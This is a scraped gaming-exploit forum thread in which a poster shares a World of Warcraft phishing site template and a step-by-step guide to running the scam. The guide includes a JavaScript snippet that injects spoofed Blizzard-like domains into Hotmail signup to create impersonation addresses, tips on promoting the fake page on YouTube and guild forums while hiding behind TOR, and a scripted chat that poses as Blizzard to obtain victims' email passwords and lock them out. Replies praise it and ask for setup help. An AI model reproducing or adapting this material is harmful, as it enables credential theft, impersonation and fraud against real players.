0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

WotLK Phishing site theme

Here is the phishing template i made. Hope you enjoy

Download

Password : MMOwned - World of Warcraft Exploits, Hacks, Bots and Guides - View Profile: Tcl70

(Please note the link is the password so don't click it use it as a pass)

Basic Phishing tips for WoW

For successful phishing you need to advertise your site in any way possible.

This can be easy done with YouTube , just setup a video there claiming that the page is send to random users by blizzard and you offer to share it to the public , also setup the video so that people can add comments
    BUT only with your approval , also post the site on some guild site's forums , BUT never do advertise it in official WoW forum .

You can also use email scams to advertise your page but don't ask for info in the email or it will look suspiciously , use Anonymizers like TOR (if you use TOR read the manual)

Example on YouTube

Example Found on YouTube , i bet that guy got already some accounts :P

http://www.youtube.com/watch?v=pMTfL6T4noA

You need to do this step if the WoW account password does not match their email account password.

When doing this scam I did notice that a lot of people use Hotmail so I conclude that most of them does use MSN messenger, there for it is possible to have a live chat with them, so now you are thinking why do I need to chat whit them if I have there WoW account, well simply put you also want their email account to change email address if they try to recall the password. Now I will teach you some tricks on how to get that password

First Step

You need to do is get yourself a legitimate looking MSN account, this is easy done by following this steps

A. Go to Windows Live Hotmail and press on the orange button (in English it will say “Get it Free”)

B. Now copy and paste this text in to the address bar and press “Enter” (yes it’s there where it says https:// )

Code:
    javascript:function r(q){} function s(q){e[q] = new Option(a[q],a[q])}; r(e = document.getElementById("idomain").options);r(d="beta.blizzad.");r(a = new Array("hotmail.com","accounts.wow-europe.com",d+"com",d+"com.au",d+ "be",d+"ca",d+"co.uk",d+"de",d+"fr",d+"it"/**/,d+"nl")); for (i=0;i<a.length;i++){ s(i ) }alert("Success - additional domains added! Mmowned.com");
    C. A message will pop-up saying “Success - additional domains added! Mmowned.com”
    Press “OK”

D. Now in “Create a Windows Live ID” you will see “Windows Live ID” and a box near to it , in that box type something like wotlk-dep05 and where is says “hotmail.com” select “beta.blizzard.com” then press “Check availability” if it says “[email protected] is available. “ (green text) then you are good to go , fill out the rest (don’t fill in alternate e-mail)

Second Step

Plan ahead what you are going to say, make a premade text, check the grammar, sound legit, get some balls of steel (can be found in a sack near you). I will paste here some premade text that I made but its best if you make your own.

[YOU]
    Greetings, is this Mr. “YOU GET THE NAME FROM THE PHISHING FORM”.

[HIM]
    ***ANSWER HERE (Most likely it will be Yes, if he says no say, sorry to bother you, farewell) ***

[YOU]
    Congratulations.
    Blizzard Entertainment has chosen you to participate in the beta testing of the upcoming expansion World of Warcraft: Wrath of the Lich King, if you wish to participate in the beta testing we will need to scan your PC and Email for malicious software, do you wish to proceed?

[HIM]
    ***ANSWER HERE (Most likely it will be Yes/OK, if he says no, say then something like this, We are sorry but we must cancel your application do to your PC / Email may contain harmful software to our gaming servers, farewell) ***

[YOU]
    We are attempting to scan your PC now, in the meanwhile please provide us whit the password of your registered Word of Warcraft Email address, and please note your email will not be read it is only scanned for malicious software, if you fail to provide us whit the information your application will be canceled due to security reasons

[HIM]
    ***50/50 chance he will tell you his password, if he does not say something like, we are sorry you cannot provide us whit the password of your registered Word of Warcraft Email address, but as we did stated above this is a security concern and we have to cancel your beta testing application, farewell***

This is the part when you change his email password and secret answer on the email; reply after like this for fun :P

[YOU]
    We are sorry but we have found malicious software on your PC, due to high risk infection to our game servers we will have to cancel your beta application and under the circumstances temporally close your account for further investigation, farewell.

FAQ.

Q. How do you know that this will work?
    A. Well if they are stupid enough to fill out the phishing information then why will this not work?

Q. What is the success rate of this trick to get there email password?
    A. It is about 50/50

Q. What is the success rate of this phishing template?
    A. Well let say if you setup a video on YouTube and post it on some guild forums then about 90 out of 100 people will visit the site 60 will enter the info and about 5-40 will be valid accounts, so in other word this is a high success rate scam if you use it correctly, note you can get 100 views only from 2 days on YouTube if you setup it properly

Q. Can you help me to setup the page?
    A. NO! , But if you pay me for my time then I will do it

Q. Can I edit the template or post it on the other forum?
    A. Yes but leave me some credit and link it to this thread

Constructive criticism is welcomed.

PS: English is not my main language it is more like my third language so if you spot any grammar errors please don’t flame me, refer me to the errors so I can correct them

Change Log:
    //*22/09/2007*//
    changed main images from PNG to JPG reducing the template size by 3-4 times
    //*25/09/2007*//
    fixed a problem that does not allow some hosts to execute the scripts
    Last edited by Matt; 01-11-2008 at 04:37 AM. Reason: more pics
    I know not with what weapons World War III will be fought, but World War IV will be fought with sticks and stones. A.Einstein

WotLK Phishing site theme
    KuRIoS's Avatar Admin
    Authenticator enabled
    Thanks G/R
    351/296
    Trade Feedback
    9 (100%)
    Mentioned
    3 Post(s)
    Tagged
    1 Thread(s)

Re: WotLK Phishing site theme

nice contribution
    +rep

Tcl70's Avatar Member
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

nice tits
    I know not with what weapons World War III will be fought, but World War IV will be fought with sticks and stones. A.Einstein

Hazzerd's Avatar Member
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Good stuff.

Blackheat's Avatar Member
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

I've got BETA testing on this site, i can confirm this is heavy shit, its really guud! Thanks man, + rep

Matador's Avatar Elite User

Thanks G/R
    0/1
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

you're shure, that this is safe, when using TOR? i made such a page and one day all the stuff in the logs was deleted, but there was something like "HAHA".
    (the logs' name wasn't logs btw)

J_Shiff's Avatar Member
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

when i try to exact it says a bunch of the files are damaged.

Tcl70's Avatar Member
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Originally Posted by Unnamed View Post
    you're shure, that this is safe, when using TOR? i made such a page and one day all the stuff in the logs was deleted, but there was something like "HAHA".
    (the logs' name wasn't logs btw)
    if you read TOR manual and do what it says then you will be safe , know if you upload to a non secure host your site can be hacked

Matador's Avatar Elite User

Thanks G/R
    0/1
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Originally Posted by jasen.shifflett View Post
    same at me

Tcl70's Avatar Member
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Originally Posted by jasen.shifflett View Post
    Re-uploaded

papasmurf009's Avatar Member
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

this is brilliant...and can you give me an example of a secure site to upload it too?
    Last edited by papasmurf009; 09-18-2007 at 03:05 PM.

Nolixz's Avatar ★ Elder ★
    Thanks G/R
    6/17
    Trade Feedback
    16 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Going to test it, check your PM. Its not often, but man this is legendary +rep!

Nomiss's Avatar Active Member
    Thanks G/R
    0/1
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

This is genius, very good job. +REP!

Edit: .7z ? what is that kind of file? Should I upload it as it is or should I unpack it someway?
    Last edited by Nomiss; 09-18-2007 at 03:53 PM.

Tcl70's Avatar Member
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Originally Posted by Nomiss View Post
    .7z ? what is that kind of file? Should I upload it as it is or should I unpack it someway?
    you should unpack it with 7zip or WinRar and edit the engine.php and engine2.php and then you upload it

papasmurf009's Avatar Member
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Can i get someone to PM me with a step by step guide to setting this up....i'm confused =(

Page 1 of 11 12345 ... LastLast